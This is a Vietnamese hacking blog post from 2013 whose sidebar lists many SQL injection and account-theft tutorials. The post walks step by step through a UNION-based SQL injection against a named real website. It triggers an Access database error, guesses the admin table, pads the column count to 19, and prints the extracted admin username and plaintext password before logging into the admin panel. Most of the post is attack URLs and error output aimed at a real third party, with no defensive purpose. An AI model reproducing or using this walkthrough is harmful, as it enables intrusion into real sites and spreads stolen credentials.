My Banner
Link Sahabat
Forum
- local attack (1)
- new (1)
- sql injection (36)
- tài liệu IT (1)
- Trick Blogger (1)
- Trick facebook (9)
Benner Friends
abc
Blog Archive
-
▼
2013
(50)
-
▼
tháng 12
(36)
- tut 406
- tut ko có use và admin
- tut check sql sài lệnh mid 100,1000(sql nang cao)
- tut xpath (sql nang cao)
- tut thêm =-1148952776'
- tut SQL injection dạng HTML
- Một số cách kiếm acc facebook
- Hướng dẫn cách lấy toàn bộ bài viết từ blog khác
- các lệnh local
- Khai thác Error Based - Quick Blind
- MỘT SỐ LƯU Ý KHI KHAI THÁC SQL
- các dạng tut check sql
- Một số cách Bypass SQL injection
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- [TUT] Hack SQLi Injection Căn Bản Cho NewBie
- Từ dễ đến khó "Bypass WAF"
- [TUT] Bypass Filter + 403 Forbidden SQL Injection
- Advanced - Jet SQL
- Advanced - Blind SQL
- Advanced - Blind SQL
- Advanced - Group by,Order by,Limit
- Advanced - Bypass SQL injection
- Advanced - Bypass SQL injection
- Advanced - Blind SQL
- Advanced - MySQL Blind SQL Cheat Sheets
- Basic - MySQL injection
- Basic - lỗi SQL id=?' cat=?' - part 2
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - lỗi SQL id=?' cat=?' Tìm Shop lỗi
- Basic - Unable to run Query
- tut hướng dẫn check sql bang html
- tổng hợp các link hack site
- Tut SQL Base64 encode/decode
- TUT ko co user va admin tim kiem member
- --------------error base------------
- tut tb_user
-
▼
tháng 12
(36)
Được tạo bởi Blogger.
Translate
Chủ Nhật, 22 tháng 12, 2013
Advanced - Jet SQL
a thử test lỗi nhá
http://www.mtdplaza.com/tintuc.asp?tin_ID=147
thêm dấu ‘ vào đằng sau chắc cái này ai cũng biết
sau khi thêm song nó ra như thế này
Microsoft OLE DB Provider for ODBC Drivers error ’80040e14′ [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression ‘tin_ID=147”.
/admin/admin_newsdetail.asp, line 12
ok chúng ta bắt đầu khai thác nhá
đầu tiên dùng câu lệnh
union select 0,1 from tb_mane
tb_manecái này là bạn phải đoán mò thui
thường nó là
tb_admin
tbl_admin
tbl_user v……..
Trong trường hợp này mình đoán la tb_admin
và đường link sẽ là
http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1 from tb_admin
he he Đúng luôn
Microsoft OLE DB Provider for ODBC Drivers error ’80004005′ [Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.
/tintuc.asp, line 20
bây giờ tiếp ta khai thác columns
các bạn thêm
http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10 from tb_admin
má đến 10 rồi mà vẫn chưa ra
thế là thế nào
vẫn không nản
http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from tb_admin
oa oa đến 17 rồi mà vẫn chưa ra thế là sao nhỉ
Cố nữa xem nào chẳng nghẽ đến đây rồi thôi sao
phù
hô hô thế là ra rồi mẹ đến 18
http://www.mtdplaza.com/tintuc.asp?tin_ID=147 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from tb_admin
he he thế song rồi nó ra cái số
1 và 2
ta thay số 1 = username
he he nó ra
admin
thế là ta đc user rồi
Thay típ số 2 là : passrowd
trông mà vui thía :
pas của nó là : dungtrang
bây giờ ta login xem
http://www.mtdplaza.com/login <<
Chà Hok đc thử cái khác
http://www.mtdplaza.com/admin/
a a a đc rồi
Nhãn:
sql injection
Đăng ký:
Đăng Nhận xét (Atom)
Giới thiệu bản thân
Join My Group
webcom
Translators
Statistik
Follow
noo
no
Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )